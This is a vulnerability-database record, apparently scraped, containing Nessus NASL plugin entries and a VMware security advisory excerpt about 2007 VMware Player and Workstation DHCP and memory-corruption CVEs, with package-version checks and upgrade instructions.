"p-cpe:/a:canonical:ubuntu_linux:vmware-player-kernel-modules", "p-cpe:/a:canonical:ubuntu_linux:vmware-player-kernel-modules-2.6.15-29", "p-cpe:/a:canonical:ubuntu_linux:vmware-player-kernel-modules-2.6.17-12", "p-cpe:/a:canonical:ubuntu_linux:vmware-player-kernel-modules-2.6.20-16", "p-cpe:/a:canonical:ubuntu_linux:vmware-player-kernel-source", "p-cpe:/a:canonical:ubuntu_linux:vmware-server-kernel-modules-2.6.20-16", "p-cpe:/a:canonical:ubuntu_linux:vmware-tools-kernel-modules-2.6.20-16", "p-cpe:/a:canonical:ubuntu_linux:xorg-driver-fglrx", "p-cpe:/a:canonical:ubuntu_linux:xorg-driver-fglrx-dev", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts", "cpe:/o:canonical:ubuntu_linux:6.10", "cpe:/o:canonical:ubuntu_linux:7.04"], "id": "UBUNTU_USN-543-1.NASL", "href": "https://www.tenable.com/plugins/nessus/28250", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-543-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(28250);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2007-0061\", \"CVE-2007-0062\", \"CVE-2007-0063\", \"CVE-2007-4496\", \"CVE-2007-4497\", \"CVE-2007-5023\", \"CVE-2007-5024\", \"CVE-2007-5025\", \"CVE-2007-5617\", \"CVE-2007-5618\", \"CVE-2007-5619\");\n script_xref(name:\"USN\", value:\"543-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 6.10 / 7.04 : linux-restricted-modules-2.6.17/20, vmware-player-kernel-2.6.15 vulnerabilities (USN-543-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Neel Mehta and Ryan Smith discovered that the VMware Player DHCP\nserver did not correctly handle certain packet structures. Remote\nattackers could send specially crafted packets and gain root\nprivileges. (CVE-2007-0061, CVE-2007-0062, CVE-2007-0063)\n\nRafal Wojtczvk discovered multiple memory corruption issues in VMware\nPlayer. Attackers with administrative privileges in a guest operating\nsystem could cause a denial of service or possibly execute arbitrary\ncode on the host operating system. (CVE-2007-4496, CVE-2007-4497).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/543-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:avm-fritz-firmware-2.6.17-12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:avm-fritz-firmware-2.6.20-16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:avm-fritz-kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:fglrx-control\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:fglrx-kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-restricted-modules-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-restricted-modules-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-restricted-modules-2.6-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-restricted-modules-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:nvidia-glx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:nvidia-glx-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:nvidia-glx-legacy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:nvidia-glx-legacy-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:nvidia-glx-new\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:nvidia-glx-new-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:nvidia-kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:nvidia-legacy-kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:nvidia-new-kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:vmware-player-kernel-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:vmware-player-kernel-modules-2.6.15-29\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:vmware-player-kernel-modules-2.6.17-12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:vmware-player-kernel-modules-2.6.20-16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:vmware-player-kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:vmware-server-kernel-modules-2.6.20-16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:vmware-tools-kernel-modules-2.6.20-16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xorg-driver-fglrx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xorg-driver-fglrx-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/09/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2021 Canonical, Inc. / NASL script (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|6\\.10|7\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 6.10 / 7.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2007-0061\", \"CVE-2007-0062\", \"CVE-2007-0063\", \"CVE-2007-4496\", \"CVE-2007-4497\", \"CVE-2007-5023\", \"CVE-2007-5024\", \"CVE-2007-5025\", \"CVE-2007-5617\", \"CVE-2007-5618\", \"CVE-2007-5619\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-543-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"vmware-player-kernel-modules\", pkgver:\"2.6.15.11-13\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"vmware-player-kernel-modules-2.6.15-29\", pkgver:\"2.6.15.11-13\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"vmware-player-kernel-source\", pkgver:\"2.6.15.11-13\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"avm-fritz-firmware-2.6.17-12\", pkgver:\"3.11+2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"avm-fritz-kernel-source\", pkgver:\"3.11+2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"fglrx-control\", pkgver:\"8.28.8+2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"fglrx-kernel-source\", pkgver:\"8.28.8+2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"linux-restricted-modules-2.6.17-12-386\", pkgver:\"2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"linux-restricted-modules-2.6.17-12-generic\", pkgver:\"2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"linux-restricted-modules-common\", pkgver:\"2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"nvidia-glx\", pkgver:\"1.0.8776+2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"nvidia-glx-dev\", pkgver:\"1.0.8776+2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"nvidia-glx-legacy\", pkgver:\"1.0.7184+2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"nvidia-glx-legacy-dev\", pkgver:\"1.0.7184+2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"nvidia-kernel-source\", pkgver:\"1.0.8776+2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"nvidia-legacy-kernel-source\", pkgver:\"1.0.7184+2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"vmware-player-kernel-modules-2.6.17-12\", pkgver:\"2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"xorg-driver-fglrx\", pkgver:\"7.1.0-8.28.8+2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"xorg-driver-fglrx-dev\", pkgver:\"7.1.0-8.28.8+2.6.17.9-12.4\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"avm-fritz-firmware-2.6.20-16\", pkgver:\"3.11+2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"avm-fritz-kernel-source\", pkgver:\"3.11+2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"fglrx-control\", pkgver:\"8.34.8+2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"fglrx-kernel-source\", pkgver:\"8.34.8+2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-restricted-modules-2.6.20-16-386\", pkgver:\"2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-restricted-modules-2.6.20-16-generic\", pkgver:\"2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-restricted-modules-2.6.20-16-lowlatency\", pkgver:\"2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"linux-restricted-modules-common\", pkgver:\"2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"nvidia-glx\", pkgver:\"1.0.9631+2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"nvidia-glx-dev\", pkgver:\"1.0.9631+2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"nvidia-glx-legacy\", pkgver:\"1.0.7184+2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"nvidia-glx-legacy-dev\", pkgver:\"1.0.7184+2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"nvidia-glx-new\", pkgver:\"1.0.9755+2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"nvidia-glx-new-dev\", pkgver:\"1.0.9755+2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"nvidia-kernel-source\", pkgver:\"1.0.9631+2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"nvidia-legacy-kernel-source\", pkgver:\"1.0.7184+2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"nvidia-new-kernel-source\", pkgver:\"1.0.9755+2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"vmware-player-kernel-modules-2.6.20-16\", pkgver:\"2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"vmware-server-kernel-modules-2.6.20-16\", pkgver:\"2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"vmware-tools-kernel-modules-2.6.20-16\", pkgver:\"2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"xorg-driver-fglrx\", pkgver:\"7.1.0-8.34.8+2.6.20.6-16.30\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"xorg-driver-fglrx-dev\", pkgver:\"7.1.0-8.34.8+2.6.20.6-16.30\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"avm-fritz-firmware-2.6.17-12 / avm-fritz-firmware-2.6.20-16 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:33:40", "description": "The remote host is affected by the vulnerability described in GLSA-200711-23 (VMware Workstation and Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in several VMware products. Neel Mehta and Ryan Smith (IBM ISS X-Force) discovered that the DHCP server contains an integer overflow vulnerability (CVE-2007-0062), an integer underflow vulnerability (CVE-2007-0063) and another error when handling malformed packets (CVE-2007-0061), leading to stack-based buffer overflows or stack corruption. Rafal Wojtczvk (McAfee) discovered two unspecified errors that allow authenticated users with administrative or login privileges on a guest operating system to corrupt memory or cause a Denial of Service (CVE-2007-4496, CVE-2007-4497). Another unspecified vulnerability related to untrusted virtual machine images was discovered (CVE-2007-5617).\n VMware products also shipped code copies of software with several vulnerabilities: Samba (GLSA-200705-15), BIND (GLSA-200702-06), MIT Kerberos 5 (GLSA-200707-11), Vixie Cron (GLSA-200704-11), shadow (GLSA-200606-02), OpenLDAP (CVE-2006-4600), PAM (CVE-2004-0813, CVE-2007-1716), GCC (CVE-2006-3619) and GDB (CVE-2006-4146).\n Impact :\n\n Remote attackers within a guest system could possibly exploit these vulnerabilities to execute code on the host system with elevated privileges or to cause a Denial of Service.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2007-11-20T00:00:00", "type": "nessus", "title": "GLSA-200711-23 : VMware Workstation and Player: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0813", "CVE-2006-3619", "CVE-2006-4146", "CVE-2006-4600", "CVE-2007-0061", "CVE-2007-0062", "CVE-2007-0063", "CVE-2007-1716", "CVE-2007-4496", "CVE-2007-4497", "CVE-2007-5617"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:vmware-player", "p-cpe:/a:gentoo:linux:vmware-workstation", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200711-23.NASL", "href": "https://www.tenable.com/plugins/nessus/28262", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200711-23.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(28262);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0813\", \"CVE-2006-3619\", \"CVE-2006-4146\", \"CVE-2006-4600\", \"CVE-2007-0061\", \"CVE-2007-0062\", \"CVE-2007-0063\", \"CVE-2007-1716\", \"CVE-2007-4496\", \"CVE-2007-4497\", \"CVE-2007-5617\");\n script_xref(name:\"GLSA\", value:\"200711-23\");\n\n script_name(english:\"GLSA-200711-23 : VMware Workstation and Player: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200711-23\n(VMware Workstation and Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in several VMware\n products. Neel Mehta and Ryan Smith (IBM ISS X-Force) discovered that\n the DHCP server contains an integer overflow vulnerability\n (CVE-2007-0062), an integer underflow vulnerability (CVE-2007-0063) and\n another error when handling malformed packets (CVE-2007-0061), leading\n to stack-based buffer overflows or stack corruption. Rafal Wojtczvk\n (McAfee) discovered two unspecified errors that allow authenticated\n users with administrative or login privileges on a guest operating\n system to corrupt memory or cause a Denial of Service (CVE-2007-4496,\n CVE-2007-4497). Another unspecified vulnerability related to untrusted\n virtual machine images was discovered (CVE-2007-5617).\n VMware products also shipped code copies of software with several\n vulnerabilities: Samba (GLSA-200705-15), BIND (GLSA-200702-06), MIT\n Kerberos 5 (GLSA-200707-11), Vixie Cron (GLSA-200704-11), shadow\n (GLSA-200606-02), OpenLDAP (CVE-2006-4600), PAM (CVE-2004-0813,\n CVE-2007-1716), GCC (CVE-2006-3619) and GDB (CVE-2006-4146).\n \nImpact :\n\n Remote attackers within a guest system could possibly exploit these\n vulnerabilities to execute code on the host system with elevated\n privileges or to cause a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200606-02\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200702-06\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200704-11\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200705-15\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200707-11\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2007/000001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200711-23\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All VMware Workstation users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-emulation/vmware-workstation-5.5.5.56455'\n All VMware Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-emulation/vmware-player-1.0.5.56455'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vmware-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vmware-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-emulation/vmware-player\", unaffected:make_list(\"ge 1.0.5.56455\"), vulnerable:make_list(\"lt 1.0.5.56455\", \"eq 2.0.0.45731\"))) flag++;\nif (qpkg_check(package:\"app-emulation/vmware-workstation\", unaffected:make_list(\"ge 5.5.5.56455\"), vulnerable:make_list(\"lt 5.5.5.56455\", \"eq 6.0.0.45731\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"VMware Workstation and Player\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:52:23", "description": "Problems addressed by these patches :\n\nI Arbitrary code execution and denial of service vulnerabilities\n\n This release fixes a security vulnerability that could allow a guest operating system user with administrative privileges to cause memory corruption in a host process, and thus potentially execute arbitrary code on the host. (CVE-2007-4496)\n\n This release fixes a denial of service vulnerability that could allow a guest operating system to cause a host process to become unresponsive or exit unexpectedly. (CVE-2007-4497)\n\n Thanks to Rafal Wojtczvk of McAfee for identifying and reporting these issues.\n\nII Hosted products DHCP security vulnerabilities addressed\n\n This release fixes several vulnerabilities in the DHCP server that could enable a specially crafted packets to gain system-level privileges. (CVE-2007-0061, CVE-2007-0062, CVE-2007-0063)\n\n Thanks to Neel Mehta and Ryan Smith of the IBM Internet Security Systems X-Force for discovering and researching these vulnerabilities.\n\nIII Windows based hosted product vulnerability in IntraProcessLogging.dll and vielib.dll.\n\n This release fixes a security vulnerability that could allow a malicious remote user to exploit the library file IntraProcessLogging.dll to overwrite files in a system.\n (CVE-2007-4059)\n\n This release fixes a security vulnerability that could allow a malicious remote user to exploit the library file vielib.dll to overwrite files in a system. (CVE-2007-4155)\n\n Thanks to the Goodfellas Security Research Team for discovering and researching these vulnerabilities.\n\nIV Escalation of privileges on Windows hosted systems\n\n This release fixes a security vulnerability in which Workstation was starting registered Windows services in an insecure manner.\n This vulnerability could allow a malicious user to escalate user privileges.\n\n Thanks to Foundstone for discovering this vulnerability.\n\nV Potential denial of service using VMware Player\n\n This release fixes a problem that prevented VMware Player from launching. This problem was accompanied by the error message VMware Player unrecoverable error: (player) Exception 0xc0000005 (access violation) has occurred.\n\nVI ESX Service Console updates\n\na. Service console package Samba, has been updated to address the following issues :\n\n Various bugs were found in NDR parsing, used to decode MS-RPC requests in Samba. A remote attacker could have sent carefully crafted requests causing a heap overflow, which may have led to the ability to execute arbitrary code on the server. (CVE-2007-2446)\n\n Unescaped user input parameters were being passed as arguments to /bin/sh. A remote, authenticated, user could have triggered this flaw and executed arbitrary code on the server. Additionally, this flaw could be triggered by a remote unauthenticated user if Samba was configured to use the non-default username map script option.\n (CVE-2007-2447)\n\n Thanks to the Samba developers, TippingPoint, and iDefense for identifying and reporting these issues.\n\n Note: These issues only affect the service console network, and are not remote vulnerabilities for ESX Server hosts that have been set up with the security best practices provided by VMware.\n http://www.vmware.com/resources/techresources/726\n\nb. Updated bind package for the service console fixes a flaw with the way ISC BIND processed certain DNS query responses.\n\n ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. Under some circumstances, a malicious remote user could launch a Denial-of-Service attack on ESX Server hosts that had enabled DNSSEC validation.\n (CVE-2007-0494)\n\n Note: These issues only affect the service console network, and are not remote vulnerabilities for ESX Server hosts that have been set up with the security best practices provided by VMware.\n http://www.vmware.com/resources/techresources/726\n\nc. This patch provides updated service console package krb5 update.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) assigned the names CVE-2007-2442, CVE-2007-2443, and CVE-2007-2798 to these security issues.\n\n Thanks to Wei Wang of McAfee Avert Labs discovered these vulnerabilities.\n\n Note: The VMware service console does not provide the kadmind binary, and is not affected by these issues, but a update has been provided for completeness.\n\nd. Service console update for vixie-cron\n\n This patch provides an updated service console package vixie-cron.\n Cron is a standard UNIX daemon that runs specified programs at scheduled times.\n\n A denial of service issue was found in the way vixie-cron verified crontab file integrity. A local user with the ability to create a hardlink to /etc/crontab could potentially prevent vixie-cron from executing certain system cron jobs. (CVE-2007-1856)\n\n Thanks to Raphael Marichez for identifying this issue.\n\ne. Service console update for shadow-utils\n\n This patch provides an updated shadow-utils package. A new user's mailbox, when created, could have random permissions for a short period. This could enable a local malicious user to read or modify the mailbox. (CVE-2006-1174)\n\nf. Service console update for OpenLDAP\n\n This patch provides a updated OpenLDAP package. A flaw could allow users with selfwrite access to modify the distinguished name of any user, instead of being limited to modify only their own distinguished name. (CVE-2006-4600)\n\ng. Service console update for PAM\n\n This patch provides an updated PAM package A vulnerability was found that could allow console users with access to certain device files to cause damage to recordable CD drives. Certain file permissions have now been modified to disallow access.\n (CVE-2004-0813)\n\n A flaw was found with console device permissions. It was possible for various console devices to retain ownership of the previoius console user after logging out, which could result in leakage of information to an unauthorized user. (CVE-2007-1716)\n\nh. Service console update for GCC\n\n This patch provides security fixes for the service console GNU Compiler Collection (GCC) packages that include C, C++, Java, Fortran 77, Objective C, and Ada 95 GNU compilers and related support libraries.\n\n A flaw was found in the fastjar utility that could potentially allow a malicious user to create a JAR file which, if unpacked using fastjar, could write to any file that an authorized user had write access to. (CVE-2006-3619)\n\n Thanks to J&uuml;rgen Weigert for identifying this issue.\n\ni. Service Console update for GDB\n\n This patch provides a security fix for the service console GNU debugger (GDB). Various vulnerabilities were found in GDB. These vulnerabilities may allow a malicious user to deceive a user into loading debugging information into GDB, enabling the execution of arbitrary code with the privileges of the user. (CVE-2006-4146)", "cvss3": {}, "published": "2009-07-27T00:00:00", "type": "nessus", "title": "VMSA-2007-0006 : Critical security updates for all supported versions of VMware ESX Server, VMware Server, VMware Workstation, VMware ACE, and VMware Player", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0813", "CVE-2006-1174", "CVE-2006-3619", "CVE-2006-4146", "CVE-2006-4600", "CVE-2007-0061", "CVE-2007-0062", 